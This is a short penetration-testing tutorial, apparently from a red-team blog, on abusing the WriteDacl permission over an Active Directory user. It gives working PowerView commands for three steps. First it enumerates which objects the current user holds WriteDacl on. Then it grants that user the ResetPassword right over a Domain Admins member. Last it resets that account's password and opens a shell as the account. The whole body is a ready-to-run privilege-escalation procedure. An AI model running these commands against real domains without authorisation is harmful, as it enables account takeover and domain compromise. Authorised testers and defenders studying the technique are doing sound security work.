WriteDacl On User

WriteDacl

WriteDacl : Is a permission that allows you to modify object’s ACEs. If you have WriteDacl on user object, you can give yourself a right i.e Resetpassword that will allow you to reset user’s password, thereby escalating your privileges.

Enumeration

PowerView

WriteDacl Enumeration

Get your current user’s sid by executing whoami /user, import powerview, then execute the below command to get the list of objects on which you have WriteDacl right.

Command

get-objectacl -resolveguids | ? {($_.securityidentifier -eq "[your_current_user_sid]") -and ($_.activedirectoryrights -like "*WriteDacl*")}

below image shows the current user usman has WriteDacl right on user object ali

User Enumeration

Execute the below command to get more information about the target user.

Command

get-netuser [target_user]

below image shows the target user ali is a member of Domain Admins

BloodHound

You can also get thesame result using bloodhound.

below image shows the current user usman has WriteDacl right on user object ali who is a member of Domain Admins

Exploitation

PowerView

Give Resetpassword Right

Execute the below command to give yourself Resetpassword right.

Command

add-domainobjectacl -TargetIdentity [target_user] -PrincipalIdentity [Your Current User] -Rights Resetpassword

You can verify it using the below command.

Command

get-objectacl -resolveguids | ? {$_.securityidentifier -eq "[your_current_user_sid]"}

Reset Password

With resetpassword right given, you can reset his password and login to his account by executing the below command

Command

$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass 
runas /user:[domain\user] cmd.exe

References

• https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse